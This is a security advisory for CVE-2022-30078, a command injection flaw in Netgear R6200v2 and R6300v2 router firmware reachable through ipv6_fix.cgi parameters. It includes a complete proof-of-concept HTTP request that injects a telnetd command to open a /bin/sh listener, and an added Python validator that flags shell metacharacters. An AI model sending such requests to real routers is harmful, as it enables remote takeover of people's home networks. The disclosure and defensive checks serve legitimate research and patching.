CVE-2022-30078: vulnerabilities/CVE-2022-30078.md at main · 10TG/vulnerabilities

NETGEAR R6200_V2 firmware versions through R6200v2-V1.0.3.12_10.1.11 and R6300_V2 firmware versions through R6300v2-V1.0.4.52_10.0.93 allow remote authenticated attackers to execute arbitrary commands via shell metacharacters in the ipv6_fix.cgi ipv6_wan_ipaddr, ipv6_lan_ipaddr, ipv6_wan_length, or ipv6_lan_length parameters.

Command injection vulnerability in Netgear R6200_v2 and R6300v2 routers

Basic information

  • CVE-ID: CVE-2022-30078
  • Vendor: Netgear
  • Product: R6200_v2 and R6300_v2
  • Firmware version: all firmware versions, including the latest R6200v2-V1.0.3.12_10.1.11 and R6300v2-V1.0.4.52_10.0.93
  • Firmware download links: https://www.downloads.netgear.com/files/GDC/R6200V2/R6200v2-V1.0.3.12_10.1.11.zip
    https://www.downloads.netgear.com/files/GDC/R6300V2/R6300v2-V1.0.4.52_10.0.93.zip
  • Type: Insecure permissions - code execution

Vulnerability description

The vulnerability exists in the binary /sbin/acos_service in all R6200_v2 and R6300_v2 firmware versions, including the latest R6200v2-V1.0.3.12 and R6300v2-V1.0.4.52. Other products may also be affected, but they have not yet been analyzed.
Taking the latest R6200_V2_1.0.3.12 firmware as an example, the four variables ipv6_wan_ipaddr, ipv6_lan_ipaddr, ipv6_wan_length, and ipv6_lan_length are passed into a function at offset 0x1B070.

Analyzing the subsequent if statement confirms that all four variables can lead to command injection: each value is inserted into a command string by sprintf through a %s format specifier, and the resulting string is then passed to system(). Because the values are never filtered for shell metacharacters, whoever controls them controls the argument of that system() call.

Through further attempts, we found that remote authenticated attackers can modify the values of the vulnerable parameters on the page http://192.168.1.1/IPV6_fixed.htm by sending a modified request. Because the vulnerable parameters are saved directly to nvram after the request is sent, attackers can then execute arbitrary commands remotely, since they control the parameter of a system() call.
After visiting the web page and sending a POST request in which the ipv6_wan_ipaddr parameter is set to %24%28telnetd+-l+%2Fbin%2Fsh+-p+1235+-b+0.0.0.0%29, the router actually executes the command $(telnetd -l /bin/sh -p 1235 -b 0.0.0.0).
A potential PoC is shown below:

POST /ipv6_fix.cgi?id=2068267834 HTTP/1.1
Host: 192.168.1.1
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:99.0) Gecko/20100101 Firefox/99.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 1087
Origin: http://192.168.1.1
Authorization: Basic YWRtaW46YWRtaW4x
Connection: close
Referer: http://192.168.1.1/IPV6_fixed.htm
Cookie: XSRF_TOKEN=1222440606
Upgrade-Insecure-Requests: 1
apply=Apply&login_type=Fixed&IPv6WanAddr1=2001&IPv6WanAddr2=3CA2&IPv6WanAddr3=010F&IPv6WanAddr4=00A1&IPv6WanAddr5=121C&IPv6WanAddr6=0000&IPv6WanAddr7=0000&IPv6WanAddr8=0010&ProfixWanLength=6&IPv6Gateway1=2001&IPv6Gateway2=3CA2&IPv6Gateway3=010F&IPv6Gateway4=00A1&IPv6Gateway5=121C&IPv6Gateway6=0000&IPv6Gateway7=0000&IPv6Gateway8=0002&DAddr1=&DAddr2=&DAddr3=&DAddr4=&DAddr5=&DAddr6=&DAddr7=&DAddr8=&PDAddr1=&PDAddr2=&PDAddr3=&PDAddr4=&PDAddr5=&PDAddr6=&PDAddr7=&PDAddr8=&IpAssign=auto&IPv6LanAddr1=3113&IPv6LanAddr2=3CA2&IPv6LanAddr3=010F&IPv6LanAddr4=001A&IPv6LanAddr5=121B&IPv6LanAddr6=0000&IPv6LanAddr7=0000&IPv6LanAddr8=0001&ProfixLanLength=6&ipv6_wan_ipaddr=%24%28telnetd+-l+%2Fbin%2Fsh+-p+1235+-b+0.0.0.0%29&ipv6_lan_ipaddr=3113%3A3CA2%3A010F%3A001A%3A121B%3A0000%3A0000%3A0001&ipv6_wan_length=6&ipv6_lan_length=6&ipv6_pri_dns=%3A%3A%3A%3A%3A%3A%3A&ipv6_sec_dns=%3A%3A%3A%3A%3A%3A%3A&ipv6_wan_gateway=%24%28telnetd+-l+%2Fbin%2Fsh+-p+1234+-b+0.0.0.0%29&ipv6_enable_dhcp=&ipv6_proto=fixed

Evidence of the vulnerability is shown below (screenshot not reproduced on this page):

Similarly, the other three parameters can be changed to construct similar commands; evidence of the attacks using these parameters is shown below (screenshots not reproduced on this page):
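As an added defensive example (not code from the advisory, from Netgear, or from the researchers), the Python below audits an ipv6_fix.cgi form body the way a WAF rule or a hardened CGI handler would before anything is written to nvram: the four parameters named in the advisory are flagged if they carry shell metacharacters, if the address fields are not strict IPv6 addresses, or if the length fields are not prefix lengths in 0..128. The parameter names and the `$(...)` URL encoding come from the advisory; the sample bodies are constructed.

```python
import ipaddress
from urllib.parse import parse_qs

# The four ipv6_fix.cgi parameters the advisory reports reaching sprintf()/system()
IPV6_ADDR_PARAMS = ("ipv6_wan_ipaddr", "ipv6_lan_ipaddr")
PREFIX_LEN_PARAMS = ("ipv6_wan_length", "ipv6_lan_length")
# Characters that let a value break out of a sprintf()-built /bin/sh command line
SHELL_META = set("$`;|&<>(){}\n\r'\"\\")

def is_strict_ipv6(value):
    """True only if value parses as a bare IPv6 address (zone ids are rejected)."""
    if "%" in value:
        return False
    try:
        ipaddress.IPv6Address(value)
    except ValueError:
        return False
    return True

def is_prefix_length(value):
    """True only for a plain decimal integer in the range 0..128."""
    return value.isdigit() and int(value) <= 128

def audit_ipv6_fix_body(body):
    """Return (parameter, reason) findings for a raw x-www-form-urlencoded body.
    An empty list means every vulnerable parameter carried a well-formed value."""
    findings = []
    fields = parse_qs(body, keep_blank_values=True)
    for name in IPV6_ADDR_PARAMS + PREFIX_LEN_PARAMS:
        for value in fields.get(name, []):
            meta = "".join(sorted(set(value) & SHELL_META))
            if meta:
                findings.append((name, "shell metacharacters %r" % meta))
            elif name in IPV6_ADDR_PARAMS and not is_strict_ipv6(value):
                findings.append((name, "not a valid IPv6 address"))
            elif name in PREFIX_LEN_PARAMS and not is_prefix_length(value):
                findings.append((name, "prefix length outside 0..128"))
    return findings

# Constructed sample bodies, abridged to the shape of the advisory's request
BENIGN_BODY = ("ipv6_proto=fixed&ipv6_wan_ipaddr=2001%3A3CA2%3A010F%3A00A1%3A121C%3A0%3A0%3A10"
               "&ipv6_lan_ipaddr=3113%3A3CA2%3A010F%3A001A%3A121B%3A0000%3A0000%3A0001"
               "&ipv6_wan_length=64&ipv6_lan_length=64")
INJECTED_BODY = ("ipv6_proto=fixed&ipv6_wan_ipaddr=%24%28echo+injected%29"
                 "&ipv6_lan_ipaddr=3113%3A3CA2%3A010F%3A001A%3A121B%3A0000%3A0000%3A0001"
                 "&ipv6_wan_length=64&ipv6_lan_length=999")
```

The same checks applied inside acos_service before the sprintf() would close the hole at its source; rejecting on metacharacters first makes the finding explain itself in a log line.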

Acknowledgment

Credit for this vulnerability goes to @maybethetricker and @river-li.
